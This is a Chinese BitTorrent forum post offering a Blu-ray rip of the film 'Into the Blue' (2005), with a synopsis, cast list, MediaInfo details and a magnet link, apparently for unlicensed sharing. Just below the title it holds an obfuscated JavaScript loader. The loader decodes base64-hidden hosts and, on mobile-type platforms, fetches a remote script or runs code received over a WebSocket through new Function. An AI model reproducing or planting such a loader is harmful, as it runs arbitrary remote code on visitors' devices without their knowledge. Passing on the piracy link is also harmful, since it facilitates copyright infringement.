碧海追踪[国英多音轨/双语字幕].Into.the.Blue.2005.1080p.BluRay.DTS.2Audio.x265-10bit 9.80GB

版主小s 1月前 203

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 碧海追踪 / 深海寻宝
◎片  名 Into the Blue
◎年  代 2005
◎产  地 美国
◎类  别 动作 / 惊悚 / 犯罪 / 冒险
◎语  言 英语
◎上映日期 2005-09-30(美国)
◎IMDb链接 https://www.imdb.com/title/tt0378109/
◎豆瓣评分 6.7/10 (7813人评价)
◎豆瓣链接 https://movie.douban.com/subject/1410557/
◎片  长 110 分钟
◎导  演 约翰·斯托克韦尔 John Stockwell (id:1000252)
◎演  员 杰西卡·阿尔芭 Jessica Alba (id:1004861)
       保罗·沃克 Paul Walker (id:1031239)
       艾什丽·斯科特 Ashley Scott (id:1010595)
       斯科特·凯恩 Scott Caan (id:1049550)
       乔什·布洛林 Josh Brolin (id:1004568)
       Chris Taloa Chris Taloa (id:1166946)
       詹姆斯·弗莱恩 James Frain (id:1031840)
       泰森·贝克福德 Tyson Beckford (id:1036697)
       德怀恩·阿德维 Dwayne Adway (id:1055481)
       彼得·加伯 Peter Guber (id:1032640)
       保罗·海斯林格 Paul Haslinger (id:1037358)
       夏恩·赫尔博特 Shane Hurlbut (id:1005024)
       丹尼斯·弗尔克勒 Dennis Virkler (id:1300109)
       萨拉·芬兰 Sarah Finn (id:1283741)
       兰迪·希勒 Randi Hiller (id:1286647)
       Maia Javan Maia Javan (id:1287622)
       戴维·F·克拉森 David F. Klassen (id:1288673)
       Robin Day Robin Day (id:1281957)
       比尔·博普 Bill Purple (id:1301850)
       拉斯·P·温特 Lars P. Winther (id:1051237)
       康拉德·E·帕尔米萨诺 Conrad E. Palmisano (id:1048392)
       戴维·戈德史密斯 David Goldsmith (id:1167316)
       Rob Meyers Rob Meyers (id:1212860)
       David Stump David Stump (id:1276361)
       胡安·卡洛斯·巴尔加斯 Juan Carlos Vargas (id:1038055)
       丹尼·S·金 Danny S. Kim (id:1288541)
       雷·麦金太尔 Ray McIntyre Jr. (id:1291625)
       威廉·梅萨 William Mesa (id:1291905)
       林肯·库普切克 Lincoln Kupchak (id:1013029)
       潘卡杰·哈德波尔 Pankaj Khandpur (id:1303799)

◎标  签 美国 / 动作 / 冒险 / JessicaAlba / 海洋 / 潜水 / 美国电影 / 2005

◎简  介
  风暴之夜,一架飞机在海上失事,坠入无边的大海深处……碧水蓝天的巴哈马海域上,失业潜水员杰拉德(保罗·沃克 Paul Walker 饰)和女友萨曼(杰西卡·阿尔芭 Jessica Alba 饰)预备寻宝深海的沉船宝藏,然而破旧的小船和竞争对手贝茨的打压让他们难以如愿,幸好律师好友布莱斯和女友阿曼达来到,于是四人出海,竟意外的发现了著名海盗的宝藏线索以及一架载满毒品的飞机。布莱斯与阿曼达打起了毒品的主意,但一心挖掘宝藏的杰拉德劝说好友远离毒品。不久,杰拉德陷入财政危机,布莱斯要杰拉德不顾萨曼的劝告以毒品获利支持发掘。而贝茨和毒枭的眼镜,也在暗中盯上了这几个寻宝的好友……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 239308356628820788465585182910803755178 (0xB4091CED6506617492CE9E6FEC3A40AA)

  4. Complete name                            : [email protected]DQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 9.80 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 12.7 Mb/s

  10. Movie name                               : Into the Blue 2005 1080p BluRay DTS 2Audio [email protected]

  11. Encoded date                             : UTC 2021-08-20 01:07:29

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 50 min

  21. Bit rate                                 : 10.7 Mb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 808 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.288

  31. Stream size                              : 8.25 GiB (84%)

  32. Title                                    : @HDSky

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio #1

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 50 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 1.16 GiB (12%)

  51. Title                                    : English

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Audio #2

  56. ID                                       : 3

  57. Format                                   : AC-3

  58. Format/Info                              : Audio Coding 3

  59. Commercial name                          : Dolby Digital

  60. Codec ID                                 : A_AC3

  61. Duration                                 : 1 h 48 min

  62. Bit rate mode                            : Constant

  63. Bit rate                                 : 448 kb/s

  64. Channel(s)                               : 6 channels

  65. Channel layout                           : L R C LFE Ls Rs

  66. Sampling rate                            : 48.0 kHz

  67. Frame rate                               : 31.250 FPS (1536 SPF)

  68. Compression mode                         : Lossy

  69. Stream size                              : 347 MiB (3%)

  70. Title                                    : Mandarin

  71. Language                                 : Chinese

  72. Service kind                             : Complete Main

  73. Default                                  : No

  74. Forced                                   : No


  75. Text #1

  76. ID                                       : 4

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 44 min

  82. Bit rate                                 : 30.3 kb/s

  83. Count of elements                        : 2130

  84. Stream size                              : 22.6 MiB (0%)

  85. Title                                    : ENG

  86. Language                                 : English

  87. Default                                  : Yes

  88. Forced                                   : No


  89. Text #2

  90. ID                                       : 5

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 45 min

  96. Bit rate                                 : 36.4 kb/s

  97. Count of elements                        : 2527

  98. Stream size                              : 27.5 MiB (0%)

  99. Title                                    : CHS&ENG

  100. Language                                 : Chinese

  101. Default                                  : No

  102. Forced                                   : No


  103. Text #3

  104. ID                                       : 6

  105. Format                                   : PGS

  106. Muxing mode                              : zlib

  107. Codec ID                                 : S_HDMV/PGS

  108. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  109. Duration                                 : 1 h 45 min

  110. Bit rate                                 : 34.7 kb/s

  111. Count of elements                        : 2527

  112. Stream size                              : 26.2 MiB (0%)

  113. Title                                    : CHT&ENG

  114. Language                                 : Chinese

  115. Default                                  : No

  116. Forced                                   : No


  117. Text #4

  118. ID                                       : 7

  119. Format                                   : PGS

  120. Muxing mode                              : zlib

  121. Codec ID                                 : S_HDMV/PGS

  122. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration                                 : 1 h 45 min

  124. Bit rate                                 : 20.0 kb/s

  125. Count of elements                        : 2527

  126. Stream size                              : 15.1 MiB (0%)

  127. Title                                    : CHS

  128. Language                                 : Chinese

  129. Default                                  : No

  130. Forced                                   : No


  131. Text #5

  132. ID                                       : 8

  133. Format                                   : PGS

  134. Muxing mode                              : zlib

  135. Codec ID                                 : S_HDMV/PGS

  136. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  137. Duration                                 : 1 h 45 min

  138. Bit rate                                 : 20.4 kb/s

  139. Count of elements                        : 2527

  140. Stream size                              : 15.4 MiB (0%)

  141. Title                                    : CHT

  142. Language                                 : Chinese

  143. Default                                  : No

  144. Forced                                   : No


  145. Menu

  146. 00:00:00.000                             : en:Chapter 01

  147. 00:05:10.417                             : en:Chapter 02

  148. 00:09:57.000                             : en:Chapter 03

  149. 00:15:51.792                             : en:Chapter 04

  150. 00:21:34.750                             : en:Chapter 05

  151. 00:28:06.958                             : en:Chapter 06

  152. 00:34:35.792                             : en:Chapter 07

  153. 00:38:41.792                             : en:Chapter 08

  154. 00:46:11.792                             : en:Chapter 09

  155. 00:50:33.292                             : en:Chapter 10

  156. 00:58:16.958                             : en:Chapter 11

  157. 01:07:06.167                             : en:Chapter 12

  158. 01:15:13.750                             : en:Chapter 13

  159. 01:20:41.875                             : en:Chapter 14

  160. 01:30:27.417                             : en:Chapter 15

  161. 01:37:52.625                             : en:Chapter 16

  162. 01:43:21.958                             : en:Chapter 17

  163. 01:45:19.958                             : en:Chapter 18




TAGS 动作 冒险 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:A04A8CCE9C94DAD61D65285992C69AC16CE8957A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回